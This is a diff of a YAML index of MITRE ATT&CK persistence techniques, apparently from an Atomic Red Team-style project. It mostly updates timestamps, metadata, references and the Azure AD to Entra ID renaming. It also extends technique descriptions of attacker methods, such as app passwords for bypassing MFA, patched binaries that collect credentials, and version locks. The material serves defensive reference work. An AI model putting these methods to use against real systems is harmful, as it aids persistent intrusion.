       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.004
     atomic_tests: []
   T1098.004:
@@ -30761,7 +31175,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.004
     atomic_tests: []
   T1546.012:
@@ -30815,7 +31228,7 @@ persistence:
         description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
           18, 2017.
         source_name: Symantec Ushedix June 2008
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.112Z'
       name: 'Event Triggered Execution: Image File Execution Options Injection'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g  notepad.exe</code>). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -30848,8 +31261,6 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.012
     atomic_tests: []
   T1574.005:
@@ -30880,7 +31291,7 @@ persistence:
         description: 'Stefan Kanthak. (2015, December 8). Executable installers are
           vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
           of privilege. Retrieved December 4, 2014.'
-      modified: '2020-10-27T14:49:39.188Z'
+      modified: '2020-03-26T19:20:23.030Z'
       name: Executable Installer File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -30915,12 +31326,10 @@ persistence:
       - Administrator
       - User
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:18.602Z'
       name: 'Event Triggered Execution: Accessibility Features'
       description: |-
         Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -30997,7 +31406,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.008
     atomic_tests: []
   T1136.002:
@@ -31051,7 +31459,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.002
     atomic_tests: []
   T1542.002:
@@ -31083,7 +31490,7 @@ persistence:
           health and make sure it's not already dying on you. Retrieved October 2,
           2018.
         source_name: ITWorld Hard Disk Health Dec 2014
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-01T20:43:55.632Z'
       name: Component Firmware
       description: |-
         Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.
@@ -31113,55 +31520,10 @@ persistence:
       - SYSTEM
       x_mitre_system_requirements:
       - Ability to update component device firmware from the host operating system.
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.001:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
-      type: attack-pattern
-      created: '2019-11-07T20:29:17.788Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.001
-        url: https://attack.mitre.org/techniques/T1137/001
-      - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
-        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
-          Retrieved July 3, 2017.
-        source_name: Microsoft Change Normal Template
-      - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
-        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
-          Retrieved July 3, 2017.
-        source_name: MSDN VBA in Office
-      - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
-        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
-          Retrieved July 3, 2017.
-        source_name: enigma0x3 normal.dotm
-      - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
-        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
-          Retrieved July 3, 2017.
-        source_name: Hexacorn Office Template Macros
-      - source_name: GlobalDotName Jun 2019
-        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
-        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
-          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
-      - source_name: CrowdStrike Outlook Forms
-        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
-        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
-          Movement and Persistence. Retrieved February 5, 2019.
-      - source_name: Outlook Today Home Page
-        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
-        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
-          Retrieved February 5, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:01:35.918Z'
       name: 'Office Application Startup: Office Template Macros.'
       description: "Adversaries may abuse Microsoft Office templates to obtain persistence
         on a compromised system. Microsoft Office contains templates that are part
@@ -31192,6 +31554,7 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: 'Many Office-related persistence mechanisms require changes
         to the Registry and for binaries, files, or scripts to be written to disk
         or existing files modified to include malicious scripts. Collect events related
@@ -31201,9 +31564,13 @@ persistence:
         also be investigated since the base templates should likely not contain VBA
         macros. Changes to the Office macro security settings should also be investigated.(Citation:
         GlobalDotName Jun 2019)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -31211,11 +31578,47 @@ persistence:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21
+      created: '2019-11-07T20:29:17.788Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/001
+        external_id: T1137.001
+      - source_name: MSDN VBA in Office
+        description: Austin, J. (2017, June 6). Getting Started with VBA in Office.
+          Retrieved July 3, 2017.
+        url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office
+      - source_name: Hexacorn Office Template Macros
+        description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62.
+          Retrieved July 3, 2017.
+        url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/
+      - source_name: Microsoft Change Normal Template
+        description: Microsoft. (n.d.). Change the Normal template (Normal.dotm).
+          Retrieved July 3, 2017.
+        url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea
+      - source_name: enigma0x3 normal.dotm
+        description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm.
+          Retrieved July 3, 2017.
+        url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/
+      - source_name: CrowdStrike Outlook Forms
+        description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral
+          Movement and Persistence. Retrieved February 5, 2019.
+        url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746
+      - source_name: GlobalDotName Jun 2019
+        description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+          - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+        url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+      - source_name: Outlook Today Home Page
+        description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+          Retrieved February 5, 2019.
+        url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.001
     atomic_tests: []
   T1546.009:
@@ -31247,7 +31650,7 @@ persistence:
         description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
           Retrieved December 18, 2017.
         source_name: Sysinternals AppCertDlls Oct 2007
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.052Z'
       name: 'Event Triggered Execution: AppCert DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -31295,13 +31698,11 @@ persistence:
       x_mitre_effective_permissions:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1546.009
     atomic_tests: []
   T1098.005:
     technique:
-      modified: '2023-10-03T17:38:39.065Z'
+      modified: '2024-09-25T20:39:53.597Z'
       name: Device Registration
       description: "Adversaries may register a device to an adversary-controlled account.
         Devices may be registered in a multifactor authentication (MFA) system, which
@@ -31314,16 +31715,16 @@ persistence:
         FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
         only a username and password to enroll the account's first device or to enroll
         a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
-        an adversary with existing access to a network may register a device to Azure
-        AD and/or its device management system, Microsoft Intune, in order to access
+        an adversary with existing access to a network may register a device to Entra
+        ID and/or its device management system, Microsoft Intune, in order to access
         sensitive data or resources while bypassing conditional access policies.(Citation:
         AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
-        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+        Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
         be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
         campaigns via intra-organizational emails, which are less likely to be treated
         as suspicious by the email client.(Citation: Microsoft - Device Registration)
         Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
-        on an Azure AD tenant by registering a large number of devices.(Citation:
+        on an Entra ID tenant by registering a large number of devices.(Citation:
         AADInternals - BPRT)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -31335,16 +31736,16 @@ persistence:
       - Mike Moran
       - Joe Gumke, U.S. Bank
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
       - Windows
-      - SaaS
-      x_mitre_version: '1.2'
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Active Directory: Active Directory Object Creation'
@@ -31399,7 +31800,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542:
     technique:
@@ -31460,7 +31860,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.015:
     technique:
@@ -31536,7 +31935,7 @@ persistence:
         url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
         description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
           5, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T16:36:37.042Z'
       name: 'Boot or Logon Autostart Execution: Login Items'
       description: |-
         Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
@@ -31564,8 +31963,6 @@ persistence:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1547.015
     atomic_tests: []
   T1205.001:
@@ -31591,7 +31988,7 @@ persistence:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -31616,23 +32013,21 @@ persistence:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1098.001:
     technique:
-      modified: '2024-02-28T14:35:00.862Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Credentials'
       description: "Adversaries may add adversary-controlled credentials to a cloud
         account to maintain persistent access to victim accounts and instances within
         the environment.\n\nFor example, adversaries may add credentials for Service
         Principals and Applications in addition to existing legitimate credentials
-        in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
-        Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
-        both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
-        With sufficient permissions, there are a variety of ways to add credentials
-        including the Azure Portal, Azure command line interface, and Azure or Az
-        PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+        in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+        Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+        include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+        Guidance) With sufficient permissions, there are a variety of ways to add
+        credentials including the Azure Portal, Azure command line interface, and
+        Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
         infrastructure-as-a-service (IaaS) environments, after gaining access through
         [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
         may generate or import their own SSH keys using either the <code>CreateKeyPair</code>
@@ -31642,11 +32037,15 @@ persistence:
         usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
         Expel Behind the Scenes)\n\nAdversaries may also use the <code>CreateAccessKey</code>
         API in AWS or the <code>gcloud iam service-accounts keys create</code> command
-        in GCP to add access keys to an account. If the target account has different
-        permissions from the requesting account, the adversary may also be able to
-        escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+        in GCP to add access keys to an account. Alternatively, they may use the <code>CreateLoginProfile</code>
+        API in AWS to add a password that can be used to log into the AWS Management
+        Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+        Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+        If the target account has different permissions from the requesting account,
+        the adversary may also be able to escalate their privileges in the environment
+        (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
         Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
-        2.0) For example, in Azure AD environments, an adversary with the Application
+        2.0) For example, in Entra ID environments, an adversary with the Application
         Administrator role can add a new set of credentials to their application's
         service principal. In doing so the adversary would be able to access the service
         principal’s roles and permissions, which may be different from those of the
@@ -31657,12 +32056,19 @@ persistence:
         tied to the permissions of the original user account. These temporary credentials
         may remain valid for the duration of their lifetime even if the original account’s
         API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
-        Persistence)"
+        Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+        adversaries may be able to add an app password to a user account.(Citation:
+        Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+        legacy devices that do not support multi-factor authentication (MFA), adding
+        an app password can allow an adversary to bypass MFA requirements. Additionally,
+        app passwords may remain valid even if the user’s primary password is reset.(Citation:
+        Microsoft Entra ID App Passwords)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Expel
       - Oleg Kolesnikov, Securonix
@@ -31671,6 +32077,7 @@ persistence:
       - Alex Soler, AttackIQ
       - Dylan Silva, AWS Security
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -31679,13 +32086,16 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
-      - Azure AD
       - SaaS
-      x_mitre_version: '2.7'
+      - Identity Provider
+      x_mitre_version: '2.8'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
+      - 'Active Directory: Active Directory Object Creation'
+      - 'Active Directory: Active Directory Object Modification'
       type: attack-pattern
       id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
       created: '2020-01-19T16:10:15.008Z'
@@ -31711,10 +32121,18 @@ persistence:
         description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
           Principals. Retrieved January 19, 2020.
         url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+      - source_name: Lacework AI Resource Hijacking 2024
+        description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+          June 6). Lacework Labs. Retrieved July 1, 2024.
+        url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
       - source_name: GCP SSH Key Add
         description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
           October 1, 2020.
         url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+      - source_name: Permiso Scattered Spider 2023
+        description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+          SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+        url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
       - source_name: Blue Cloud of Death Video
         description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
           Azure. Retrieved November 21, 2019.'
@@ -31723,10 +32141,20 @@ persistence:
         description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
           Azure. Retrieved October 23, 2019.'
         url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+      - source_name: Microsoft Entra ID App Passwords
+        description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+          authentication with legacy applications using app passwords. Retrieved May
+          28, 2024.
+        url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
       - source_name: Microsoft SolarWinds Customer Guidance
         description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
           Cyber Attacks. Retrieved December 17, 2020.
         url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+      - source_name: Mandiant APT42 Operations 2024
+        description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+          Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+          Retrieved May 28, 2024.'
+        url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
       - source_name: Expel Behind the Scenes
         description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
           July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -31743,14 +32171,11 @@ persistence:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.001
     atomic_tests: []
   T1556.008:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-05-04T18:02:51.318Z'
       name: Network Provider DLL
       description: "Adversaries may register malicious network provider dynamic link
         libraries (DLLs) to capture cleartext user credentials during the authentication
@@ -31825,7 +32250,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.003:
     technique:
@@ -31914,24 +32338,27 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.003
     atomic_tests: []
   T1554:
     technique:
-      modified: '2024-04-16T13:03:40.824Z'
+      modified: '2024-10-12T16:52:46.067Z'
       name: Compromise Host Software Binary
       description: |-
         Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
 
-        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+        Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
 
         An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+        After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
       x_mitre_contributors:
       - CrowdStrike Falcon OverWatch
+      - Liran Ravich, CardinalOps
+      - Jamie Williams (U ω U), PANW Unit 42
       x_mitre_deprecated: false
       x_mitre_detection: "Collect and analyze signing certificate metadata and check
         signature validity on software that executes within the environment. Look
@@ -31945,7 +32372,7 @@ persistence:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '2.0'
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Deletion'
       - 'File: File Modification'
@@ -31960,6 +32387,11 @@ persistence:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1554
         external_id: T1554
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Unit42 Banking Trojans Hooking 2022
         description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
           Financially Motivated Malware Became Infrastructure. Retrieved September
@@ -31973,11 +32405,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:27:11.065Z'
       name: 'Event Triggered Execution: Change Default File Association'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by a file type association. When a file is opened, the default program
@@ -32003,7 +32434,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -32017,7 +32447,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -32044,8 +32473,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -32056,7 +32485,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests: []
   T1546.014:
@@ -32097,7 +32527,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -32117,12 +32547,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
